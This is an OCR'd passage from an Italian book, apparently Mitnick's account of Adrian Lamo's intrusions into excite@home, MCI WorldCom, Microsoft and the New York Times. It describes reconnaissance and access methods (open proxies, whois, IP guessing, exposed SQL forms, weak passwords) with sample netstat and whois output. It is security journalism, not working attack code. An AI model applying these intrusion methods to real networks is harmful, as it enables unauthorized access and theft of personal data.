denti di @home, eseguì una serie di comandi che gli fornirono le 
informazioni sulle connessioni di rete attive verso altri sistemi. 
Uno di questi comandi, “netstat”, gli mostrò l’attività di rete di 
un dipendente che era connesso in quel momento alla rete in- 
terna dall'esterno, e gli rivelò quali sistemi stava usando nella re- 
te della corporation. 

Per mostrare un campione dei dati restituiti da netstat, ho 
lanciato il programma per esaminare l'operazione sulla mia mac- 
china; una parte del listato si presenta così: 


C\Documents and Settings\guest>netstat-a 
Active Connections 


Proto Local Address Foreign Address State 

TCP lockpicker:1411 64.12.26.50:5190 

ESTABLISHED 

TCP lockpicker:2842 catlow.cyberverse.com:22 ESTABLISHED 
TCP lockpicker:2982 www.kevinmitnick.com:http ESTABLISHED 
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Il “Local Address” indica il nome della macchina locale (“lock- 
picker” era al tempo il nome che usavo per il mio computer) e il 
numero di porta della macchina. Il “Foreign Address” mostra il no- 
me della macchina ospitante o l'indirizzo Ip del computer remo- 
to, e il numero di porta su cui è stata effettuata una connessione. 
Per esempio, la prima riga del rapporto indica che il mio compu- 
ter ha effettuato un collegamento con 64.12.26.50 sulla porta 5190, 
la porta che viene usata di solito per l’Instant Messenger di Ame- 
rica online. “State” indica lo stato della connessione: “Established” 
se la connessione è attiva in quel momento, “Listening” se la mac- 
china locale è in attesa di un collegamento in entrata. 

La riga seguente, su cui figura “catlow.cyberverse.com”, for- 
nisce il nome dell'host del sistema cui mi ero collegato. L'ultima 
linea, contenente “www.kevinmitnick.com:htip”, indica che ero 
collegato attivamente al mio sito web personale. 

Il proprietario del computer di destinazione non è costretto 
a gestire i servizi sulle porte più conosciute, ma può usare il com- 
puter per usare delle porte non standard. Per esempio, l’http (il 
web server) viene comunemente gestito sulla porta 80, ma il pro- 
prietario può cambiarla e gestire un web server su una qualsiasi 
porta a sua scelta. Consultando il listato delle connessioni Tcp 
degli impiegati, Adrian scoprì che i dipendenti di @home si col- 
legavano ai web server su porte non standard. 

Da informazioni di questo tipo, Adrian riuscì ottenere gli in- 
dirizzi Ip delle macchine interne che valeva la pena esplorare per 
ottenere informazioni sensibili sulla corporation @home. Tra va- 
rie perle, trovò un database di nomi, indirizzi e-mail, numeri se- 
riali di modem per il cavo, indirizzi Ip attivi, persino il tipo di si- 
stema operativo installato sul computer del cliente, per ognuno dei 
quasi tre milioni di abbonati alla banda larga della compagnia. 

Si era trattato, nelle parole di Adrian, di “una tipologia esoti- 
ca di attacco”, perché aveva comportato il dirottamento della con- 
nessione di un impiegato fuori sede che si collegava alla rete in- 
terna. 

Adrian lo considera un modo relativamente semplice per es- 
sere ritenuti affidabili da una rete. La parte difficile — che richie- 
se un mese di tentativi e di errori — fu il compilare una mappa 
dettagliata della rete: cosa sono le varie parti e in che rapporto 
stanno le une con le altre. 

L'ingegnere capo della rete di excite@home era un uomo cui 
Adrian aveva passato delle informazioni in passato e di cui sen- 
tiva di potersi fidare. Abbandonandola sua tattica abituale di usa- 
re un intermediario per dare delle informazioni alle aziende in 
cui era penetrato, chiamò l’ingegnere direttamente e gli comu- 
nicò di avere scoperto alcune debolezze critiche nella rete della 
compagnia. L'ingegnere si disse disposto a un incontro, nono- 
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stante lora tarda proposta da Adrian. A mezzanotte, si sedettero 
insieme attorno a un tavolo. 

“Gli mostrai della documentazione che avevo accumulato nel 
tempo. Chiamò il loro addetto alla sicurezza e lo incontrammo nel 
campus {di excite@home] intorno alle 4,30 del mattino.” I due uo- 
mini passarono in rassegna i materiali di Adrian e gli chiesero co- 
me aveva fatto a entrare esattamente. Intorno alle sei del mattino, 
mentre stavano per finire, Adrian disse che gli sarebbe piaciuto ve- 
dere fisicamente il server proxy che aveva usato per entrare. 


Lo rintracciammo. E loro mi chiesero: “Tu come la renderesti sicu- 
ra questa macchina?”. 


Adrian sapeva già che il server non veniva usato per alcuna 
funzione importante, che era solo un “sistema random”: 


Tirai fuori dalla tasca il mio coltello, uno di quei coltellini colorati 
multiuso. Mi avvicinai alla macchina, tagliai il cavo e dissi: “Ades- 
so la macchina è sicura”. 

Dissero: “Così va bene”. L'ingegnere scrisse un appunto e lo incollò 
sulla macchina. Il biglietto diceva: “Non ricollegare”. 


Adrian aveva scoperto un modo per entrare nella compagnia 
passando per una sola macchina che aveva cessato probabilmen- 
te di avere una funzione necessaria molto tempo prima. Ma nes- 
suno l’aveva mai notato o si era preoccupato di rimuoverla dalla 
rete. “Ogni compagnia,” dice Adrian, “ha tonnellate di macchine 
buttate lì, ancora connesse ma che non vengono usate.” Ognuna 
di esse è potenzialmente una porta per l’accesso non autorizzato. 


Mci WorldCom 


Come aveva fatto con molte altre reti prima, fu ancora una 
volta attaccando i server proxy che Adrian trovò le chiavi del re- 
gno di WorldCom. Iniziò la ricerca usando il suo strumento pre- 
ferito di navigazione, un programma chiamato ProxyHunter, 
che individua i server proxy aperti. Lanciandolo sul suo porta- 
tile, analizzò l'indirizzo Internet di WorldCom, individuando ra- 
pidamente cinque proxy aperti, uno dei quali era nascosto in 
una Url che finiva con wcom.com. Da lì, ebbe solo bisogno di 
configurare il suo browser per usare uno dei proxy e poté navi- 
gare facilmente la rete privata di WorldCom, come fosse un di- 
pendente qualsiasi. 

Una volta dentro, incontrò altri livelli di sicurezza, che ri- 
chiedevano delle password per accedere a diverse pagine web del- 
la intranet. Sono sicuro che alcune persone troveranno sorpren- 


121 


dente quanto possono essere pazienti gli intrusi come Adrian e 
quante ore sono disposti a dedicare per portare a compimento 
un determinato lavoro. Due mesi dopo, Adrian iniziò finalmen- 
te a compiere delle incursioni all’interno. 

Riuscì a entrare nel sistema delle risorse umane di World- 
Com, che gli diede i nomi e i numeri di social security di tutti gli 
ottantaseimila dipendenti della compagnia. Con queste infor- 
mazioni e la data di nascita di una persona (si affida ad any- 
birthday.com), fu in grado di azzerare la password di un dipen- 
dente e di accedere ai registri dei libri paga, contenenti informa- 
zioni come lo stipendio e i contatti d'emergenza. Avrebbe anche 
potuto modificare le istruzioni per i bonifici bancari, dirottando 
sul suo conto i versamenti per molti dipendenti. Non ne fu ten- 
tato, ma osserva che “molte persone sarebbero disposte a darse- 
la a gambe per duecentomila dollari”. 


Dentro Microsoft 


Al momento della nostra intervista, Adrian è in attesa di giu- 
dizio per diverse accuse in campo informatico; ha una storia da 
raccontare su un incidente per cui non è stato denunciato, ma 
che è stata comunque inclusa nelle informazioni pubblicate dal 
procuratore federale. Non volendo aggiungere altre denunce al- 
l'elenco stilato dal procuratore, si sente in obbligo di essere cau- 
to nel raccontarci la sua storia sulla Microsoft. Con un tono evi- 
dentemente sarcastico, ci spiega: 


Posso dirvi cosa si presumeva. Si presumeva che ci fosse una pagi- 
na web che avevo presumibilmente trovato, che presumibilmente 
non richiedeva un’autenticazione, che non recava indicazioni che 
[l'informazione fosse] brevettata e non conteneva assolutamente nul- 
la a eccezione di un menu di ricerca. 


Anche la regina delle compagnie del software non è sempre 
sicura. 

Inserendo un nome, Adrian realizzò “presumibilmente” di 
avere i dettagli di un ordinativo online di un cliente. Secondo 
Adrian il governo ha descritto il sito come un archivio di infor- 
mazioni di acquisto e spedizione su chiunque abbia mai ordina- 
to un prodotto online dal sito web della Microsoft. Il sito conte- 
neva inoltre dei dati sugli ordini per i quali le carte di credito era- 
no state rifiutate. Tutto questo sarebbe stato imbarazzante se le 
informazioni fossero mai venute in possesso di qualcuno al di 
fuori della compagnia. 

Adrian fornì i particolari sulla penetrazione a un giornalista 
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del “Washington Post”, in base alle sue solite condizioni che nul- 
la doveva essere pubblicato finché la breccia nella sicurezza non 
fosse stata riparata. Il giornalista riferì i particolari alla Micro- 
soft, dove gli addetti dell’Ît non furono contenti nell'apprendere 
notizia. “La Microsoft voleva veramente sporgere denuncia,” di- 
ce Adrian. “Fecero una valutazione eccessiva dei danni: una fat- 
tura da centomila dollari.” In seguito qualcuno nella compagnia 
probabilmente ci ripensò. Ad Adrian fu quindi detto che la Mi- 
crosoft “aveva perso la fattura”. L'accusa di intrusione non ven- 
ne espunta dalle sue carte, ma non vi fu associata alcuna richie- 
sta in denaro. (A giudicare dagli archivi online dei giornali, i di- 
rettori del “Washington Post” non considerarono l'incidente rile- 
vante da un punto di vista informativo, nonostante Microsoft fos- 
se l’obiettivo e nonostante il ruolo avuto da uno dei loro giorna- 
listi in questa storia. E mi chiedo il perché.) 


Un eroe ma non un santo: l'hack del “New York Times” 


Un giorno Adrian stava leggendo il “New York Times” online, 
quando gli venne improvvisamente “la curiosità lampo” sul se 
fosse stato in grado di penetrare nella rete telematica del gior- 
nale. “Ero già entrato nel ‘Washington Post,” dice, ma ammette 
che quel tentativo non aveva dato frutti: “Non avevo trovato nul- 
la di interessante”. 

Il “Times” sembrava porre una sfida ancora più alta, poiché 
era probabile che fossero diventati sensibili sulla questione del- 
la sicurezza in seguito a un hack molto pubblico e imbarazzan- 
te avvenuto due anni prima, quando un gruppo chiamato H4G 
(“Hacking for Girlies”) aveva defacciato il loro sito. Gli autori del 
defacciamento avevano criticato la firma tecnologica del “Times”, 
John Markoff, per gli articoli che aveva scritto su di me. Articoli 
che avevano contribuito al duro trattamento che avevo subito da 
parte del Dipartimento di giustizia. 

Adrian andò online e iniziò a esplorare. Innanzitutto visitò il 
sito web del giornale e scoprì rapidamente che era stato esterna- 
lizzato, cioè che non era ospitato dal “Times” stesso ma da un In- 
ternet Service Provider esterno. Questa è una buona pratica per 
un'azienda: significa che una penetrazione che va a segno nel si- 
to web non garantisce l’accesso alla rete della corporation. Per 
Adrian, significava che avrebbe dovuto lavorare sodo per trova- 
re una via d’ingresso. 

“Io non mi do una lista di cose da fare,” dice Adrian a pro- 
posito del suo approccio alle intrusioni. Ma “quando faccio una 
ricognizione, presto molta attenzione a raccogliere informazio- 
ni interrogando altre fonti”. In altri termini, non inizia sondan- 
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do immediatamente il sito web della compagnia che vuole attac- 
care, perché questo potrebbe creare un tracciato che porterebbe 
a lui. Invece, l'American Registry for Internet Numbers (Arin) — 
organizzazione no profit responsabile della gestione della nu- 
merazione di Internet per il Nord America — mette a disposizio- 
ne, gratuitamente, dei validi strumenti di ricerca. 

Digitando “New York Times” nella finestra di dialogo “Whois” 
(chi è) di arin.net, si ottiene un elenco di dati che appare così: 


New York Times (NYT-3) 

NEW YORK TIMES COMPANY (NYT-4) 

New York Times Digital (NYTD) 

New York Times Digital (AS21568) NYTD 21568 

NEW YORK TIMES COMPANY NEW-YORK84-79 (NET-12-160-79- 
0-1) 12.160.79.0 — 12.160.79.255 

New York Times SBC068121080232040219 (NET-68-121-80-232-1) 
68.121.80.232 — 68.121.80.239 

New York Times Digital PNAP-NYM-NYT-RM-01 (NET-64-94-185- 
0-1) 64.94.185.0 - 64.94.185.255 


I gruppi di quattro numeri separati da punti sono indirizzi 
Ip, che possono essere pensati come gli equivalenti Internet di un 
indirizzo di posta con un numero di casa, strada, città e stato. Un 
listato che mostra un campo variabile di indirizzi (per esempio, 
12.160.79.0-12.160.79.255) viene definito “netblock”. 

Poi fece una ricerca sulle porte di una serie di indirizzi ap- 
partenenti al “New York Times” e si mise in attesa, mentre il pro- 
gramma scansionava gli indirizzi alla ricerca di porte aperte, nel- 
la speranza che avrebbe identificato alcuni sistemi interessanti 
da attaccare. Li trovò. Analizzando un certo numero di porte aper- 
te, scoprì che anche qui c'erano diversi sistemi che gestivano dei 
proxy aperti mal configurati, che gli permisero di collegarsi alla 
rete interna della compagnia. 

Fece delle richieste al Nome di dominio del server (Dns) del- 
la compagnia, nella speranza di trovare un indirizzo Ip che fos- 
se interno alla rete del “Times”, ma senza successo. Come passo 
successivo cercò di ricavare tutti i Dns del dominio nytimes.com. 
Dopo aver fatto un buco nell'acqua anche su questo fronte, tornò 
al sito web e questa volta ebbe più fortuna: trovò uno spazio sul 
sito che offriva al pubblico un elenco di indirizzi e-mail con tut- 
ti i dipendenti del “Times” che erano disponibili a ricevere mes- 
saggi dal pubblico. 

Nel giro di pochi minuti ricevé un messaggio e-mail dal gior-. 
nale. Non era l'elenco delle e-mail dei giornalisti che aveva ri- 
chiesto, ma era di valore in ogni caso. L'intestazione dell'e-mail 
rivelava che il messaggio proveniva dalla rete interna della com- 
pagnia e mostrava un indirizzo Ip che non era pubblico. “Le per- 
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sone non realizzano che anche un'e-mail può essere rivelatrice,” 
spiega Adrian. 

L'indirizzo Ip interno gli offriva un possibile spiraglio. Il pas- 
so successivo fu di iniziare a setacciare i proxy aperti che aveva 
già trovato, analizzando manualmente gli indirizzi Ip nello stes- 
so segmento di rete. Se la maggior parte degli intrusi cerchereb- 
be di scansionare il netblock di questo indirizzo iniziando con 
68.121.90.1 per continuare in modo progressivo fino a 
68.121.90.254, Adrian cercò di mettersi nella posizione di un im- 
piegato dell’It della compagnia che configurava la rete, immagi- 
nando che la tendenza naturale della persona sarebbe stata di 
scegliere dei numeri pieni. Così la sua pratica abituale era di ini- 
ziare dai numeri bassi — da .1 a .10 — per poi provare con le deci- 
ne come .20, .30 e così via. 

I tentativi non sembravano produrre molto. Trovò un po’ di 
web server interni, ma nessuno che fosse ricco di informazioni. 
Alla fine si imbatté in un server su cui risiedeva un vecchio sito 
in disuso della rete interna del “Times”, forse disabilitato quan- 
do il nuovo sito era stato messo in produzione, e da allora di- 
menticato. Lo trovò interessante, se lo lesse attentamente, e sco- 
prì un link che doveva in teoria puntare a un vecchio sito ma che 
lo condusse invece a una macchina di produzione attiva. 

Per Adrian, questo era il Santo Graal. La situazione iniziò ad 
apparire ancor più rosea quando scoprì che su quella macchina 
erano stati archiviati i materiali didattici per insegnare ai dipen- 
denti come usare il sistema. Era come uno studente che sfoglia 
velocemente un bignami di Grandi speranze di Charles Dickens, 
invece di leggere l’intero romanzo e cercare di capirne i temi per 
conto suo. 

Adrian era entrato ormai in troppi siti per provare un'emo- 
zione particolare per quel successo, ma stava facendo più pro- 
gressi di quanto non potesse aspettarsi. E le cose stavano per mi- 
gliorare ulteriormente. Scoprì presto un motore di ricerca inter- 
no a uso dei dipendenti per orientarsi dentro al sito. “Spesso,” di- 
ce, “gli amministratori di sistema non li configurano in modo ap- 
propriato e ti consentono di fare delle ricerche che dovrebbero 
essere proibite.” 

Come in questo caso, quando Adrian si trovò servito quello 
che definisce “il colpo di grazia”. Qualche amministratore di si- 
stema del “Times” aveva inserito una utility in una delle directory 
che permetteva di fare quella che viene chiamata una “ricerca Sql 
a finestra libera.” Il Sql, o Structured Query Language, è il lin- 
guaggio usato dalla maggior parte dei database. In questo caso, 
compariva una finestra di dialogo popup che permetteva ad Adrian 
di fare ricerche praticamente in tutti i database presenti nel si- 
stema e di ricavarne, o cambiarne, le informazioni che voleva. 
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Si accorse che l'apparecchio su cui risiedevano i server di po- 
sta elettronica girava su Lotus Notes. Gli hacker sanno che le vec- 
chie versioni di Notes permettono a un utente di consultare 

tutti gli altri database del sistema e questa parte della rete del 

“Times” stava girando sulla vecchia versione. Il database Lotus 
Notes in cui Adrian si era imbattuto gli diede “il più grande bri- 
vido, perché comprendeva tutti gli addetti, fino al singolo gior- 
nalaio, i soldi che facevano, e i loro social”, espressione gergale 
per numeri di previdenza sociale. “C'erano anche le informazio- 
ni sugli abbonati, come su chiunque avesse mai scritto per la- 
mentarsi del servizio o per fare domande.” 

Quando gli ho chiesto qual era il sistema operativo del “Times”, 
Adrian mi ha risposto di non saperlo. “Non analizzo le reti in quel 
modo,” spiega: 


Non è una questione di tecnologia, riguarda le persone e il modo in 
cui configurano le reti. La maggior parte delle persone sono molto 
prevedibili. Scopro spesso che la gente costruisce le reti sempre nel- 
lo stesso modo. 

Molti siti di e-commerce fanno questo errore. Danno per scontato 
che i clienti inseriranno i dati secondo un certo ordine. Nessuno pen- 
sa che l'utente non lo seguirà.? 


In virtù di questa prevedibilità, un hacker esperto può ese- 
guire un ordine su un sito web, seguire il processo di acquisto fi- 
no al punto in cui i dati vengono verificati, per poi tornare in- 
dietro e cambiare le informazioni sulla carta di credito. Lui si 
prende le merci; a qualcun altro viene addebitata la spesa sulla 
carta di credito. (Anche se Adrian mi ha spiegato la procedura 
nei dettagli, ci ha chiesto specificamente di non fornire una de- 
scrizione completa che permetterebbe ad altri di fare lo stesso.) 

Il punto è che gli amministratori di sistema dimenticano re- 
golarmente di pensare con la mente dell'attaccante, rendendo il 
suo lavoro molto più facile di quanto non debba essere. E questo 
spiega la sua capacità di realizzare con successo la mossa se- 
guente per penetrare nella rete del “Times”. Il motore di ricerca 
interno non doveva in teoria indicizzare l’intero sito, ma lo face- 
va. Trovò un programma che richiamava un form Sql che gli per- 
metteva di controllare i database, in questo modo poteva anche 
fare delle richieste per estrarre informazioni. Aveva poi bisogno 
di scoprire i nomi dei database su quel sistema, per cercare quel- 
li che sembravano interessanti. Così facendo trovò un database 


2 Nell'originale “No one assumes the user will go out of order”. Gioco di pa- 
role tra il non seguire l'ordine dettato dal sito, e l'essere disfunzionali (out of or- 
der), il non funzionare come previsto. [N.d.T.] 
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di grande interesse: conteneva una tabella con tutti i nomi uten- 
ti e le password di quelli che sembravano essere i dipendenti del 
“New York Times”. 

Risultò che la maggior parte delle password erano semplice- 
mente le ultime quattro cifre del numero di previdenza sociale 
della persona. E la compagnia non si era preoccupata di usare 
password differenti per l’accesso ad aree contenenti informazio- 
ni particolarmente sensibili: la stessa password funzionava ovun- 
que nel sistema. E da quel che ne sa, dice Adrian, le password al 
“Times” non sono più sicure oggi di quanto non lo erano al tem- 
po del suo attacco: 


Da lì, riuscii a entrare di nuovo nell’intranet e ad arrivare ad altre 
informazioni. Riuscii a raggiungere il desk delle news e a entrare co- 
me manager delle news, usando la sua password. 


Trovò un database che elencava tutti i detenuti degli Stati Uni- 
ti sulla base di accuse di terrorismo, comprese le persone i cui 
nomi non erano stati resi pubblici. Continuando a esplorare, in- 
dividuò un database di tutti gli autori che avevano scritto un edi- 
toriale o un commento per il “Times”. Si trattava di migliaia di 
autori con tanto di indirizzi, numeri di telefono e numeri di pre- 
videnza sociale. Fece una ricerca per “Kennedy” e trovò diverse 
pagine di informazioni. La banca dati conteneva anche le infor- 
mazioni di contatto con celebrità e personaggi pubblici, dai pro- 
fessori di Harvard a Robert Redford e Rush Limbaugh. 

Adrian aggiunse il suo nome e numero di cellulare (situato in 
un numero di codice d’area della California del Nord, il numero 
è “505-HACK”). Confidando ovviamente nel fatto che il giornale 
non si sarebbe mai accorto della nuova registrazione e sperando 
apparentemente che qualche giornalista o responsabile della pa- 
gina degli editoriali ci cascasse, compilò il suo campo d'espe- 
rienza con la voce “hacking/sicurezza e intelligence delle comu- 
nicazioni”. 

D'accordo la cosa fu inopportuna e forse imperdonabile. Ma 
anche in questo caso, per me il gesto non solo fu innocuo, ma di- 
vertente. Mi viene ancora da ridere all'idea di Adrian che riceve 
una telefonata: “Sì, è il signor Lamo? Parla tal-dei-tali del ‘New 
York Times’.” E poi viene citato in un articolo o forse gli viene 
persino chiesto di scrivere un pezzo di seicento parole sullo sta- 
to della sicurezza informatica o su qualche argomento del gene- 
re che viene pubblicato il giorno dopo sulla pagina delle opinio- 
ni e degli editoriali del giornale più influente del paese. 

Ma la storia di Adrian e del “New York Times” non finisce qui 
e il resto non è così divertente. Non era necessaria, non era tipi- 
ca di Adrian e gli causò dei seri problemi. Dopo aver interferito 
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con il listato del database degli editoriali, scoprì di poter usare 
l'abbonamento che il “Times” aveva a LexisNexis, un servizio on- 
line a pagamento per ottenere informazioni legali e notizie. 

Si ipotizza che Adrian creò cinque nuovi account e che con- 
dusse un gran numero di ricerche, più di tremila secondo il go- 
verno. 

Dopo aver navigato per tre mesi nei database di LexisNexis, 
con il “New York Times” totalmente inconsapevole che i suoi ab- 
bonamenti fossero usati da terzi, Adrian tornò alla fine al suo 
comportamento da Robin Hood che aveva caratterizzato i suoi 
attacchi precedenti alle altre compagnie. Entrò in contatto con 
un giornalista Internet molto noto (come me un ex hacker) e gli 
spiegò le vulnerabilità che aveva sfruttato e che gli avevano per- 
messo di entrare nel sistema informatico del “New York Times”. 
Ma solo dopo aver ottenuto dal giornalista la promessa che egli 
avrebbe atteso che il problema fosse riparato e che non avrebbe 
pubblicato informazioni sull’intrusione prima che Adrian non ne 
avesse informato il quotidiano. 

Il giornalista mi ha detto che quando contattò il “Times”, la 
conversazione non andò esattamente nel modo in cui lui e Adrian 
si aspettavano. Il “Times”, dice, non era interessato a quello che 
aveva da dirgli, non voleva nessuna delle informazioni che aveva 
da offrirgli, non aveva alcun interesse a parlare direttamente con 
Adrian per sapere i dettagli e si sarebbe occupato della faccenda 
per conto proprio. La persona del “Times” non voleva neanche sa- 
pere quali erano stati i metodi di accesso, acconsentendo alla fine 
a scrivere i particolari solo dopo che il giornalista ebbe insistito. 

Il giornale verificò la vulnerabilità e nel giro di quarantotto 
ore riparò la falla, dice Adrian. Ma i dirigenti del “Times” non 
avevano esattamente apprezzato il richiamo della loro attenzio- 
ne ai problemi di sicurezza. L'attacco precedente del gruppo 
Hacking for Girlies aveva ricevuto un ingente copertura stampa 
e il loro imbarazzo era stato aggravato dal fatto che i responsa- 
bili non erano mai stati catturati. (E non pensate che io c'entri 
qualcosa con l'attacco; all’epoca, ero in prigione in attesa di giu- 
dizio.) E facile supporre che i loro responsabili tecnologici aves- 
sero subito forti pressioni per garantire che non sarebbero mai 
più state le vittime di un'intrusione di hacker. Così l’esplorazio- 
ne da parte di Adrian delle loro reti telematiche potrebbe aver fe- 
rito alcuni ego e danneggiato alcune reputazioni. Il che spieghe- 
rebbe l'atteggiamento poco disponibile al compromesso del gior- 
nale quando vennero a sapere che il ragazzo aveva sfruttato la lo- 
ro generosità involontaria per mesi. 

Forse il “Times” avrebbe voluto mostrare il suo apprezzamen- 
to per essere stato messo in condizione di riparare la breccia nel 
suo sistema informatico prima che la storia della rete spalancata 
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apparisse sulla stampa. Forse fu solo quando scoprirono l’uso di 
LexisNexis che decisero di irrigidirsi. Qualunque fosse la ragione, 
le massime autorità del “Times” fecero quello che nessuna delle vit- 
time precedenti di Adrian aveva fatto: chiamarono il Fbi. 

Diversi mesi dopo, Adrian venne a sapere che il Fbi lo stava 
cercando e decise di scomparire. Il Fbi iniziò a prestare visita al- 
la famiglia, ad amici e conoscenti — stringendo la morsa e cer- 
cando di scoprire se aveva fatto sapere a qualcuno dei suoi con- 
tatti giornalistici dove si trovava. Il piano, mal concepito, pro- 
dusse diversi tentativi di ottenere sotto mandato gli appunti dai 
giornalisti cui Adrian aveva riferito delle informazioni. “Il gioco,” 
scrisse un giornalista, “si era fatto di colpo serio.” 

Adrian si consegnò dopo soli cinque giorni. Per la resa, scel- 
se uno dei suoi posti preferiti per le esplorazioni: uno Starbucks. 

Quando il polverone si fu calmato, un comunicato stampa 
pubblicato dall'ufficio del Procuratore degli Stati Uniti del di- 
stretto meridionale di New York affermò che “le spese accumu- 
late” dal “New York Times” per Fhack di Adrian, “ammontavano 
acirca trecentomila dollari (sic)”. La sua ricerca gratuita, secondo 
il governo, costituiva circa il 18 percento di tutte le ricerche ef- 
fettuate con l'account del “New York Times” nel periodo della sua 
presenza sul sito.’ 

Apparentemente il governo aveva basato i suoi calcoli su quel- 
la che potrebbe essere la spesa per voi o per me — o per chiunque 
non sia un abbonato di LexisNexis - per fare ricerche personali 
a pagamento, una quota che venne gonfiata a dodici dollari per 
una singola richiesta. Anche con questo calcolo irrazionalmente 
alto, Adrian avrebbe dovuto effettuare qualcosa come duecento- 
settanta ricerche al giorno per tre mesi di fila per raggiungere una 
cifra totale così alta. E poiché le organizzazioni grandi come il 
“Times” pagano una somma mensile per l’accesso illimitato a Lexis- 
Nexis, è probabile che non abbiano mai versato un solo centesi- 
mo in più per le ricerche di Adrian. 

Secondo Adrian, l'episodio del “New York Times” era stata 
un'eccezione nella sua carriera di hacker. Dice di aver ricevuto 
dei ringraziamenti sia da excite@home sia da Mci WorldCom (che 
era stato molto più grato quando venne confermato che Adrian 
poteva in realtà effettuare centinaia di trasferimenti bancari su 
qualche conto bancario controllato da lui). Adrian non sembra 
amareggiato ma si limita a constatare il fatto quando dice: “Il 
‘New York Times fu il solo a volermi vedere processato”. 

Per aggravare la sua posizione, il governo aveva apparente- 
mente indotto molte delle vittime precedenti di Adrian a rila- 


3 Vedi http:/www.usdoj.gov/criminal/cybercrime/lamoCharge.htm. 
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sciare delle dichiarazioni giurate sui danni subiti, comprese quel- 
le compagnie che lo avevano ringraziato per le informazioni che 
aveva fornito loro. Ma forse questo non deve stupire: una ri- 
chiesta di collaborazione da parte del Fbi o di un procuratore 
federale non è qualcosa che la maggior parte delle aziende sce- 
glierebbe di ignorare, anche se l'avevano pensata in modo diffe- 
rente fino a quel momento. 


La natura unica delle capacità di Adrian 


Anche se è alquanto atipico per un hacker, Adrian non è par- 
ticolarmente bravo in nessun linguaggio di programmazione. Il 
suo successo risiede invece nell’analizzare il modo in cui le per- 
sone pensano, configurano i sistemi, oltre che i metodi utilizza- 
ti da amministratori di sistema e di rete per costruire le archi- 
tetture di rete. Anche se si descrive come una persona con poca 
memoria e a corto termine, Adrian scopre le vulnerabilità son- 
dando le applicazioni web di una compagnia per trovare un ac- 
cesso alla rete interna. Quindi monitora la rete e si costruisce 
pazientemente una mappa mentale del modo in cui gli elemen- 
ti entrano in relazione finché il punto debole non si “materia- 
lizza” in qualche angolo della rete che la compagnia pensava fos- 
se sepolto negli oscuri recessi dell’inaccessibilità e per questo al 
riparo da attacchi. 

La sua descrizione va oltre i confini del prevedibile: 


Sono convinto che tutti i sistemi complessi abbiano qualcosa in co- 
mune, che siano i computer o l'universo. Noi stessi, come singoli 
componenti del sistema, riflettiamo questi aspetti comuni. Se riesci 
ad avere una percezione inconscia di questi elementi ricorrenti, a 
volte essi lavorano a tuo favore, portandoti in posti strani. 
L'hacking per me ha sempre avuto a che fare più con la religione che 
con la tecnologia. 


Adrian sa che se cerca di compromettere una caratteristica 
specifica del sistema, il suo tentativo con ogni probabilità andrà 
incontro a fallimento. Lasciandosi andare, guidato soprattutto 
dall’intuizione, finisce per arrivare dove vuole. 

Adrian non crede che il suo metodo sia particolarmente ori- 
ginale, ma riconosce di non aver mai incontrato un altro hacker 
che ha ottenuto gli stessi successi. 


Uno dei motivi per cui nessuna di queste compagnie, che spendono 
migliaia e migliaia di dollari sui sistemi di intercettazione, non mi 
ha mai individuato è che non faccio quello che un intruso fa abi- 
tualmente. Quando scopro un sistema di rete aperto al rischio di 
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compromissione, lo osservo nel modo in cui dovrebbe essere visto. 
Penso: “Dunque, i dipendenti accedono allo stesso tipo di informa- 
zioni. Se fossi un dipendente, che cosa chiederei di fare [al siste- 
ma]?”. E difficile [per il sistema] distinguere le attività legali da quel- 
le illegali perché passo per la stessa interfaccia di un dipendente. 
Fondamentalmente è lo stesso traffico. 


Una volta che Adrian si è fatto uno schema mentale della strut- 
tura della rete, “la cosa ha meno a che fare con il guardare dei nu- 
meri su uno schermo che non con la sensazione di essere veramente 
R dentro, alla ricerca di elementi ricorrenti. E un modo di vedere, 
uno sguardo sulla realtà. Non posso definirlo, ma lo vedo nella mia 
testa. Osservo che cosa vive e dove, il modo in cui si interrelaziona 
e si collega con il resto. E molte volte questo atteggiamento mi por- 
ta a cose che alcune persone considerano sorprendenti”. 

Nel corso di un'intervista concessa al programma della Nbc 
Nightly News, in una fotocopisteria Kinko's di New York, la trou- 
pe invitò scherzosamente Adrian a cercare di entrare nel sistema 
della Nbc. Lui dice che con le telecamere accese, riuscì ad avere 
in meno di cinque minuti delle informazioni confidenziali sullo 
schermo del suo computer. 

Adrian cerca di avvicinarsi a un sistema sia nel modo di un 
dipendente che di un estraneo. Lui è convinto che questa dico- 
tomia dica alla sua intuizione dove andare successivamente. Fa 
persino dei giochi di ruolo, fingendo da solo di essere un dipen- 
dente in trasferta con un compito specifico, che pensa e fa dei 
passi nel modo appropriato. Per lui la cosa funziona così bene, 
che le persone hanno smesso da tempo di liquidare i suoi suc- 
cessi strabilianti come il frutto di tentativi casuali al buio. 


Informazioni facili 


Una notte, nello stesso Starbucks in cui avevo preso una volta 
un caffè con lui, Adrian udì delle informazioni riservate. Sedeva a 
un tavolo con una tazza di caffè quando una macchina si fermò e 
ne uscirono cinque uomini. Si sedettero a un tavolo vicino e lui li 
ascoltò conversare; divenne immediatamente chiaro che erano 
agenti di polizia ed era quasi sicuro che si trattasse del Fbi: 


Parlarono di lavoro per circa un'ora, dimenticandosi completamente 
del fatto che ero seduto lì senza neanche toccare il caffè. Parlano di 
lavoro, le persone che apprezzano, quelle che non apprezzano. 


4 Per maggiori informazioni vedi il sito www.crime-research.org/library/ 
Kevin2. htm. 
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Scherzavano su come si può giudicare il potere di un corpo di poli- 
zia sulla base dei badge che rilascia. Gli agenti del Fbi indossano dei 
badge molto piccoli, mentre il Dipartimento truffe e gioco d’azzar- 
do rilascia dei badge grandi. Dunque il potere è inversamente pro- 
porzionale. Pensavano che la cosa fosse divertente. 


Uscendo dal caffè, gli agenti diedero uno sguardo distratto ad 
Adrian, come se stessero realizzando solo in quel momento che 
il giovane che contemplava una tazza di caffè fredda avrebbe po- 
tuto sentire cose che non doveva. 

Un'altra volta Adrian riuscì a scoprire con una sola telefona- 
ta delle informazioni riservate su Aol. Sebbene i loro sistemi di 
Information Technology siano ben protetti, Adrian dice di aver 
esposto una seria vulnerabilità quando chiamò la compagnia che 
fabbrica e stende i cavi a fibra ottica. Adrian afferma che gli fu- 
rono date tutte le cyber-mappe che mostravano i punti in cui era- 
no interrati i cavi principali e d'emergenza. “Pensarono sempli- 
cemente che se sapevi come chiamarli, dovevi essere una perso- 
na cui si poteva parlare.” Un hacker intenzionato a creare pro- 
blemi sarebbe potuto costare ad Aol milioni di dollari in mal- 
funzionamenti e riparazioni. 

Il che è piuttosto spaventoso. Adrian e io siamo d'accordo; è 
sbalorditivo quanto le persone siano sbadate nella gestione del- 
le informazioni. 


Sviluppi recenti 


